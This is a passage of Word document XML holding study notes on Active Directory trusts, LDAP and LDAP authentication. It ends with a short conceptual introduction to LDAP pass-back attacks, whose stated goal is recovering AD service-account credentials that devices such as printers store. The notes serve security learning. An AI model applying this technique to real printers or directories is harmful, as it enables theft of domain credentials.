      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a one-way trust, if Domain AAA trusts Domain BBB, this means that a user on BBB can be authorised to access resources on AAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29439E7E" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06392D61" w14:textId="530606E7" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF50AA1" wp14:editId="1E663B84">
            <wp:extent cx="5162550" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="854321292" name="Picture 6" descr="A diagram of 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1292" name="Picture 6" descr="A diagram of a diagram of a group of people&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5052" r="13141" b="-1500"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5162550" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61CCCC" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRPr="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799CEA51" w14:textId="5F5A520C" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Two-way trust relationships:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> can also be made to allow both domains to mutually authorize users from the other. By default, joining several domains under a tree or a forest will form a two-way trust relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BF3F4" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50311205" w14:textId="6FF88491" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">note that having a trust relationship between domains doesn't </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE313A2" w14:textId="2EEFFA31" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">automatically grant access to all resources on other domains. Once a trust relationship is established, you have the chance to </w:t>
      </w:r>
      <w:r w:rsidR="005D4590" w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>authorize</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r w:rsidR="00CC6F43">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">across different domains, but it's up to you what is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">actually </w:t>
      </w:r>
      <w:r w:rsidR="007B052F" w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>authorized</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FF2CD" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD9D662" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A72C50" w14:textId="579D6B34" w:rsidR="00F61A2B" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B29CE">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE1753" w14:textId="5DB14139" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312025">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lightweight Directory Access Protocol (LDAP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, used for Directory Access management, relays on TCP/IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC57F94" w14:textId="330A79DC" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It’s a protocol to talk to active directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F3070" w14:textId="3ED3BC83" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCBD1D7" wp14:editId="5BFFC470">
            <wp:extent cx="3135086" cy="984404"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="154650849"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849" name="Picture 1" descr="A blue background with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8362" cy="988573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B018C57" w14:textId="77777777" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDAP: Allow you To Search for objects without knowing their locations (Directories).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5058BED7" w14:textId="188DB7C6" w:rsidR="007B052F" w:rsidRPr="007B052F" w:rsidRDefault="007B052F" w:rsidP="008B29CE">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007B052F">
        <w:t xml:space="preserve">EX: If user needs to access printer and </w:t>
      </w:r>
      <w:r w:rsidR="006C483D" w:rsidRPr="007B052F">
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidRPr="007B052F">
        <w:t xml:space="preserve"> know where it</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B052F">
        <w:t>, LDAP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B052F">
        <w:t xml:space="preserve"> Can help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337EE105" w14:textId="371F4BD3" w:rsidR="007B052F" w:rsidRDefault="007B052F" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>LDAP Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E75C9C" w14:textId="68E91A2F" w:rsidR="007B052F" w:rsidRDefault="007B052F" w:rsidP="00697BC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72FD147B" wp14:editId="1DCEB95F">
            <wp:extent cx="3340065" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1406920142"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20142" name="Picture 3" descr="A diagram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7803" cy="1004758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0016263D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EC0D2F" wp14:editId="3648B183">
            <wp:extent cx="1992086" cy="980293"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1208693976" name="Picture 4"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976" name="Picture 4" descr="A blue background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217" cy="992168"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA276C" w14:textId="021AF790" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP Authentication: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A68347" w14:textId="439134CB" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006C483D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticate users by itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661757E5" w14:textId="24607489" w:rsidR="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="236367A4" wp14:editId="44390EF6">
            <wp:extent cx="3477986" cy="1040423"/>
            <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
            <wp:docPr id="898221590" name="Picture 2" descr="A blue screen with black arrows pointing to a whit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1590" name="Picture 2" descr="A blue screen with black arrows pointing to a white square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4979" cy="1045506"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1BABB" w14:textId="77777777" w:rsidR="00697BC1" w:rsidRDefault="0016263D" w:rsidP="00697BC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>Authentication Types: Simple, SASL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69CBBB" w14:textId="0E54602A" w:rsidR="00697BC1" w:rsidRDefault="00697BC1" w:rsidP="00697BC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B38">
        <w:t>LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD. Like Gitlab, Jenkins, Printers, VPNs</w:t>
      </w:r>
      <w:r w:rsidR="006C483D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D0B389" w14:textId="77777777" w:rsidR="006C483D" w:rsidRPr="00B83B38" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B38">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In LDAP authentication Application </w:t>
      </w:r>
      <w:r w:rsidRPr="00697BC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00B83B38">
        <w:t xml:space="preserve"> verifies the user's credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25706C91" w14:textId="34A31E6C" w:rsidR="006C483D" w:rsidRPr="00B83B38" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B38">
        <w:t>Application has a pair of AD credentials that it can use first to query LDAP and then verify the AD user's credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC2A9B" w14:textId="77777777" w:rsidR="006C483D" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55064A10" wp14:editId="6D543DBF">
            <wp:extent cx="5742214" cy="1352733"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="919941184"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4481" name="Picture 4"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045" cy="1357405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B3E65" w14:textId="77777777" w:rsidR="006C483D" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LDAP Pass-back Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE58A78" w14:textId="77777777" w:rsidR="006C483D" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="009074DD">
        <w:t>Attacks against LDAP authentication mechanisms</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696782F" w14:textId="21DD5260" w:rsidR="00336D43" w:rsidRDefault="00336D43" w:rsidP="00336D43">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83B38">
        <w:t>Our goal is to read the configuration files to recover these AD credentials that are stored on LDAB services itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE1F5E" w14:textId="411B579D" w:rsidR="006C483D" w:rsidRDefault="006C483D" w:rsidP="006C483D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As LDAP authenticates users by itself, LDAP is used by </w:t>
      </w:r>
      <w:r w:rsidR="00336D43">
        <w:t>network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> devices or services like </w:t>
      </w:r>
      <w:r w:rsidR="00336D43">
        <w:t>printers</w:t>
      </w:r>
      <w:r>
        <w:t>. EX: when user in domain need to access printer with his username &amp; password, printer send these user credentials to LDAP and LDAP authenticate this user and see if this user allowed to access printer or not, printer itself have account that for itself to access LDAP as a Printer (service user) on LDAP, printer use this account to connect LDAP then pass the normal user to LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C223824" w14:textId="77777777" w:rsidR="006C483D" w:rsidRPr="00697BC1" w:rsidRDefault="006C483D" w:rsidP="00697BC1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4D5AF2" w14:textId="04B9A718" w:rsidR="008B29CE" w:rsidRPr="008B29CE" w:rsidRDefault="008B29CE" w:rsidP="008B29CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580CF5B5" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRPr="00B0782B" w:rsidRDefault="00F61A2B" w:rsidP="00B0782B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A133831" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373DB00E" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE4070C" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1C6DBA" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACE0B55" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2DC194" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3208EC32" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672BF9A6" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541FA92F" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA55C5A" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FA7118" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0727C84D" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3D9CB6" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA23F67" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7700AC5C" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED46CE9" w14:textId="77777777" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
